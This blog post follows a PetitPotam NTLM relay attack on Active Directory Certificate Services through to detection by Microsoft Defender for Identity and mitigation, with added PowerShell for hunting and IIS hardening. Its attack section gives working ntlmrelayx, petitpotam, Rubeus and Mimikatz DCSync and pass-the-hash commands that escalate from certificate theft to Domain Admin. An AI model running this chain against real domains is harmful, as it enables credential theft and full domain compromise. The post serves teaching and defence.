PetitPotam…from attack to detection via Microsoft Defender for Identity (MDI)

Derk van der Woude
Aug 10, 2021

PetitPotam is an NTLM relay attack on Active Directory Certificate Services (AD CS) HTTP endpoints. If the following AD CS services are installed, the Active Directory is vulnerable to the attack.

See KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) for more information on how to mitigate it.

The attack

My lab setup for the attack is shown below.

The Domain Controllers have the latest Microsoft Defender for Identity (MDI) sensors installed.

PSPKIAudit

Verify vulnerable certificate templates via PSPKIAudit on the Windows 10 machine (I added Everyone with Full Control on the Computer certificate template).

Import-Module .\PSPKIAudit.psm1
Invoke-PKIAudit -CAComputerName WSRV2016-DC01.s3cur1ty.local

PetitPotam

PetitPotam is a PoC (Proof of Concept) tool which abuses the MS-EFSRPC (Encrypting File System Remote Protocol) to force a Windows host (WSRV2016-DC02; 192.168.178.11) to authenticate to another host (Kali Linux; 192.168.178.49).

An attacker can target a Domain Controller (WSRV2016-DC02; 192.168.178.11) and relay the DC's NTLM authentication to the Active Directory Certificate Services (AD CS) Web enrollment pages to enroll a certificate for the DC machine account.

NTLMRelayx

Start ntlmrelayx.py and wait for a connection; the relay targets the AD CS Web enrollment page on WSRV2016-DC01 (192.168.178.10) and requests a (computer) certificate.

Keep in mind that the --adcs option is not available in the latest release of Impacket; apply the pull request that adds the --adcs extension to exploit the AD CS vulnerability.

python3 ntlmrelayx.py -t http://192.168.178.10/certsrv/certfnsh.asp -smb2support --adcs

After ntlmrelayx is started, run PetitPotam (from the example above) against the second Domain Controller, so that WSRV2016-DC02 sends its machine credentials to Kali Linux.

python3 petitpotam.py 192.168.178.49 192.168.178.11

Authentication to http://192.168.178.10 as S3CUR1TY/WSRV2016-DC02$ succeeds; a CSR is generated and a Base64 certificate is issued for the user S3CUR1TY/WSRV2016-DC02$.

We can see the issued certificate in the Certification Authority console on the AD CS server.

Rubeus

The Base64 certificate can be used to request a Kerberos TGT (Ticket Granting Ticket).

Rubeus.exe asktgt /user:WSRV2016-DC02$ /certificate:<base64-certificate> /ptt

Keep in mind to use the latest version of Rubeus for /certificate parameter support.

With klist we can see the cached Kerberos ticket(s) on the local machine; the DC machine account ticket carries the directory replication privileges needed for DCSync.

MimiKatz — DCSync

DCSync is a Mimikatz module that uses the directory replication service to dump the password hashes of all users from the Domain Controller over the network, without an interactive logon.

lsadump::dcsync /domain:s3cur1ty.local /all /csv

The output includes the NTLM hash of a Domain Admin account (member of the Domain Admins group, RID 512), e.g. Administrator in our example.

MimiKatz — Pass the hash

Pass-the-hash (PTH) is a Mimikatz module that starts a command prompt (or PowerShell with /run:powershell.exe) in the context of the Administrator account, with Domain Admin privileges.

Before PTH we don’t have access to the Domain Controller.

privilege::debug
sekurlsa::pth /user:Administrator /domain:s3cur1ty.local /ntlm:6cff5d10edb2c4…

The command prompt (cmd.exe) has Domain Admin privileges and we can access the Domain Controller.

And …GAME OVER :-)

Microsoft Defender for Identity

Microsoft Defender for Identity is the Microsoft tool to detect attacks and anomalies in Active Directory, for example Golden Ticket (forged TGT) or Silver Ticket (forged TGS) attacks.

Microsoft Defender for Identity version 2.158.14362 detects the PetitPotam attack on Active Directory Certificate Services. The alert is "Suspicious network connection over Encrypting File System Remote Protocol".

The DCSync attack is also detected by Microsoft Defender for Identity.
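MDI raises its alerts from network traffic seen by the sensor. As an added, host-log-based check that is not part of the original post, the PowerShell below hunts a Domain Controller's Security log for the step in the middle of the chain: a Kerberos TGT request (event 4768) that used certificate pre-authentication (PreAuthType 16, PA-PK-AS-REQ) for a machine account from an address that is not that machine's own. The relayed WSRV2016-DC02$ certificate used from the Kali host shows up exactly this way. Field names are the 4768 EventData names; the expected-address map and the sample events are constructed assumptions, not real log output.

```powershell
# Added example (not from the original post): flag certificate-based TGT requests
# for machine accounts that come from an address other than the machine's own.

function Find-SuspiciousPkinitTgt {
    param(
        [Parameter(Mandatory)] [object[]] $Events,          # flat 4768 records (see ConvertFrom-KerberosTgtEvent)
        [Parameter(Mandatory)] [hashtable] $ExpectedSource  # machine account -> known address(es); assumption: admin-maintained
    )
    foreach ($e in $Events) {
        if ("$($e.PreAuthType)" -ne '16') { continue }    # PKINIT (PA-PK-AS-REQ) only
        if ($e.TargetUserName -notlike '*$') { continue }  # machine accounts only
        $ip = $e.IpAddress -replace '^::ffff:', ''         # 4768 logs IPv4 clients as IPv4-mapped IPv6
        $allowed = $ExpectedSource[$e.TargetUserName]
        if ($allowed -and ($allowed -contains $ip)) { continue }
        [pscustomobject]@{
            Account    = $e.TargetUserName
            SourceIp   = $ip
            Thumbprint = $e.CertThumbprint
            Reason     = 'certificate-based TGT for a machine account from an unexpected address'
        }
    }
}

# Flattens a real 4768 record from Get-WinEvent into the shape Find-SuspiciousPkinitTgt expects.
function ConvertFrom-KerberosTgtEvent {
    param([Parameter(Mandatory)] [System.Diagnostics.Eventing.Reader.EventRecord] $Record)
    $xml = [xml] $Record.ToXml()
    $fields = @{}
    foreach ($d in $xml.Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
    [pscustomobject] $fields
}

# Constructed sample data mirroring the lab in the post (not real log output).
$sample = @(
    [pscustomobject]@{ TargetUserName = 'WSRV2016-DC02$'; IpAddress = '::ffff:192.168.178.11'; PreAuthType = '2';  CertThumbprint = '' }
    [pscustomobject]@{ TargetUserName = 'WSRV2016-DC02$'; IpAddress = '::ffff:192.168.178.49'; PreAuthType = '16'; CertThumbprint = '<thumbprint-placeholder>' }
    [pscustomobject]@{ TargetUserName = 'Administrator';  IpAddress = '::ffff:192.168.178.20'; PreAuthType = '16'; CertThumbprint = '<thumbprint-placeholder>' }
)
# Assumption: the DC machine accounts only ever request tickets from their own addresses.
$expected = @{ 'WSRV2016-DC02$' = @('192.168.178.11'); 'WSRV2016-DC01$' = @('192.168.178.10') }

Find-SuspiciousPkinitTgt -Events $sample -ExpectedSource $expected | Format-Table -AutoSize

# On a live DC (elevated shell):
# $live = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768 } | ForEach-Object { ConvertFrom-KerberosTgtEvent $_ }
# Find-SuspiciousPkinitTgt -Events $live -ExpectedSource $expected
```

The source address is what gives this away: the later DCSync runs under a legitimate DC machine account, so an account-based filter on the replication events (4662) would not distinguish it from normal replication, which is why the network-level MDI alerts and the 4768 client address matter here.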

Microsoft 365 Defender

Microsoft 365 Defender is the XDR (eXtended Detection and Response) tool that correlates alerts into a single incident for ease of investigation and automated investigation and remediation (AIR).

Microsoft 365 Defender provides a protection layer (IPC, MDI, MDE, MDO & MCAS) over all assets of the Modern Workplace (Identity, Devices, Apps & Data).

Defense in depth and zero trust are the most practical approach against new (0-day) attacks, even when some detection capabilities are not yet implemented.

Mitigation

Remove NTLM authentication from the AD CS CertSrv virtual directory in IIS (Internet Information Services).

Or remove the Certificate Enrollment Web Service completely if not required.
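The removal of NTLM from CertSrv, together with the Extended Protection and TLS settings KB5005413 describes, can be audited and applied from PowerShell. The script below is an added example, not part of the original post or of Microsoft's KB; it assumes the web enrollment application lives at "Default Web Site/CertSrv" (adjust $Location for your deployment) and runs in an elevated shell on the CA web server.

```powershell
# Added example (not from the original post): show the weak settings, then harden
# the CertSrv virtual directory along the lines of KB5005413.

Import-Module WebAdministration

$AppHost  = 'MACHINE/WEBROOT/APPHOST'   # write to applicationHost.config as a <location> override
$Location = 'Default Web Site/CertSrv'  # assumption: default site and application path
$WinAuth  = 'system.webServer/security/authentication/windowsAuthentication'

# Reads one attribute; Get-WebConfigurationProperty returns a plain value for some
# attributes and a ConfigurationAttribute (with .Value) for others.
function Get-IisAttribute {
    param([string] $Filter, [string] $Name)
    $v = Get-WebConfigurationProperty -PSPath $AppHost -Location $Location -Filter $Filter -Name $Name
    if ($null -ne $v -and $v.PSObject.Properties['Value']) { $v.Value } else { $v }
}

# Snapshot of the three settings the relay depends on, for a before/after comparison.
function Get-CertSrvAuthState {
    $providers = Get-WebConfigurationProperty -PSPath $AppHost -Location $Location -Filter "$WinAuth/providers" -Name 'Collection' |
                 Select-Object -ExpandProperty value
    [pscustomobject]@{
        Providers     = ($providers -join ', ')                                            # weak default: 'Negotiate, NTLM'
        TokenChecking = Get-IisAttribute "$WinAuth/extendedProtection" 'tokenChecking'     # weak default: 'None'
        SslFlags      = Get-IisAttribute 'system.webServer/security/access' 'sslFlags'     # weak default: 'None'
    }
}

'Before:'; Get-CertSrvAuthState | Format-List

# 1. Drop the NTLM provider. This is how the IIS Configuration Editor scripts the
#    removal of one <add value="NTLM" /> entry from the providers collection.
Remove-WebConfigurationProperty -PSPath $AppHost -Location $Location -Filter "$WinAuth/providers" -Name '.' -AtElement @{ value = 'NTLM' }

# 2. Require Extended Protection for Authentication. Negotiate can still fall back
#    to NTLM, but a relayed response then fails the channel-binding check.
Set-WebConfigurationProperty -PSPath $AppHost -Location $Location -Filter "$WinAuth/extendedProtection" -Name 'tokenChecking' -Value 'Require'

# 3. EPA needs TLS: require SSL on the virtual directory (the site also needs an
#    HTTPS binding with a certificate the enrolling clients trust).
Set-WebConfigurationProperty -PSPath $AppHost -Location $Location -Filter 'system.webServer/security/access' -Name 'sslFlags' -Value 'Ssl'

'After:'; Get-CertSrvAuthState | Format-List
```

Verify afterwards that a domain-joined client can still enroll over https://<CA>/certsrv and that an http:// request is refused. Where no NTLM fallback is acceptable at all, the Negotiate provider can additionally be replaced by Negotiate:Kerberos, at the cost of clients that cannot obtain a Kerberos ticket for the CA web server.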
